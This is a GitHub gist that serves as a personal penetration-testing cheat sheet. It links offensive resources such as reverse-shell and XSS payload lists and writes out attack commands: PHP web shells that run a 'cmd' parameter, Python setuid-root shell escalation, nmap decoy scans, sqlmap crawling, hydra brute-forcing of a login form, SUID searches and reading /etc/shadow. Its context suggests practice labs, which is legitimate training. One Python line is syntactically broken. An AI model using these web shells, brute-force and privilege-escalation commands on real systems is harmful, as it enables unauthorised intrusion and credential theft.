Last active
April 18, 2024 13:16
-
-
Save cryptrz/79e093fb0c23bc539707807b06302489 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
######################################################### | |
https://start.me/p/vjEPvb/thug-bounty # Pentest / Bug bounty bookmarks | |
https://start.me/p/QRQb0O/trouble-fake # OSINT bookmarks | |
######################################################### | |
https://github.com/Hack-with-Github/Awesome-Hacking | |
https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md | |
https://github.com/shieldfy/API-Security-Checklist/blob/master/README.md | |
https://www.jhaddix.com/post/my-xmind-hunt-template-for-hakluke | |
https://github.com/Ignitetechnologies/Mindmap | |
######################################################### | |
https://gtfobins.github.io | |
https://cheat.sh/ | |
https://github.com/Orange-Cyberdefense/arsenal | |
https://github.com/danielmiessler/SecLists | |
https://github.com/kkrypt0nn/wordlists | |
https://github.com/fuzzdb-project/fuzzdb | |
https://cheatsheetseries.owasp.org/Glossary.html | |
https://github.com/The-Z-Labs/linux-exploit-suggester | |
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet | |
https://github.com/terjanq/Tiny-XSS-Payloads | |
https://portswigger.net/web-security/sql-injection/cheat-sheet | |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php | |
https://github.com/carlospolop/PEASS-ng/releases | |
https://github.com/gnebbia/hydra_notes | |
https://gist.github.com/sente/4dbb2b7bdda2647ba80b | |
https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt | |
https://github.com/internetwache/GitTools | |
https://github.com/Ebryx/GitDump | |
https://wordlists.assetnote.io/ | |
http://web-sniffer.net/ | |
https://scoop.sh/ | |
######################################################### | |
https://docs.adyen.com/development-resources/testing/test-card-numbers/ | |
######################################################### | |
*********************INSTALL PIP2*********************** | |
sudo apt install python2.7 | |
cd /opt && sudo curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py | |
sudo python2 get-pip.py | |
######################################################### | |
Cookie Injector: | |
https://gist.githubusercontent.com/cryptrz/a142f145d250450f408f19a52e0743b1/raw/e046cfb7cf9a4c8b50174651fef1e79e89faeda7/Cookie%2520Injector%2520(mod%2520FF%2520+%2520Chrome) | |
######################################################### | |
python3 -c "import pty;pty.spawn('/bin/bash')" | |
export TERM=xterm | |
python3 -c 'import os; execl("/bin/sh"; "sh", "-p")' | |
/usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")' | |
sudo openvpn --data-ciphers AES-256-CBC --config <file> | |
nmap -sS -Pn -D 10.10.10.1,10.10.10.2,ME -F <TARGET> | |
nmap -sS -Pn -D RND,10.10.55.33,ME,RND -F <TARGET> | |
nmap -sV --script=vulscan/vulscan.nse <URL> | |
nmap -p 53 --script dns-brute <URL> | |
ffuf -w /path/to/wordlist -t 25 -c -ac -mc 200,204,301,302, 307,400, 401,405 -u https://url.com/FFUF | |
find / -perm -u=s -type f 2>/dev/null | |
find / -perm -u=s -type f -name <word> 2>/dev/null | |
sqlmap -u https://target.com/ --dbs --random-agent --forms --crawl=2 | |
john file --wordlist=list.txt --format=Raw-MD5 | |
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/path/login.php:username=admin&password=^PASS^:Invalid Password!" | |
<?php system($_GET['cmd']);?> | |
<?php echo system($_GET['cmd']); ?> | |
<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?> | |
To temporarly switch to a bash shell: | |
exec bash --login | |
Stabilize a shell on meterpreter: | |
script /dev/null -c bash | |
CTRL + Z (nc process into the background) | |
stty raw -echo; fg | |
reset | |
xterm | |
export TERM=xterm | |
export SHELL=bash | |
########################################################### | |
********************LINUX ENUMERATION********************** | |
########################################################### | |
uname -a | |
cat/proc/version | |
cat /etc/*-release | |
cat /proc/cpuinfo | |
df -a | |
df -h | |
cat /etc/shells | |
whoami | |
pwd | |
id | |
users | |
cat /etc/passwd | |
sudo cat /etc/shadow | |
pinky | |
w | |
who -a | |
last | |
lastlog | |
ps | |
ps -e | more | |
ps aux | more | |
top | |
dpkg -l | |
route | |
sudo iptables -L | |
########################################################### | |
*******************WINDOWS ENUMERATION********************* | |
########################################################### | |
PSTools: https://learn.microsoft.com/en-us/sysinternals/downloads/pstools | |
Shareenum: https://github.com/CroweCybersecurity/shareenum | |
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
########################################################### | |
**********************HTML TEMPLATE************************ | |
########################################################### | |
<!DOCTYPE html> | |
<html lang="en" dir="ltr"> | |
<head> | |
<meta charset="utf-8"> | |
<title></title> | |
</head> | |
<body> | |
<script type="text/javascript"> | |
</script> | |
</body> | |
</html> | |
########################################################### | |
########################################################### |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment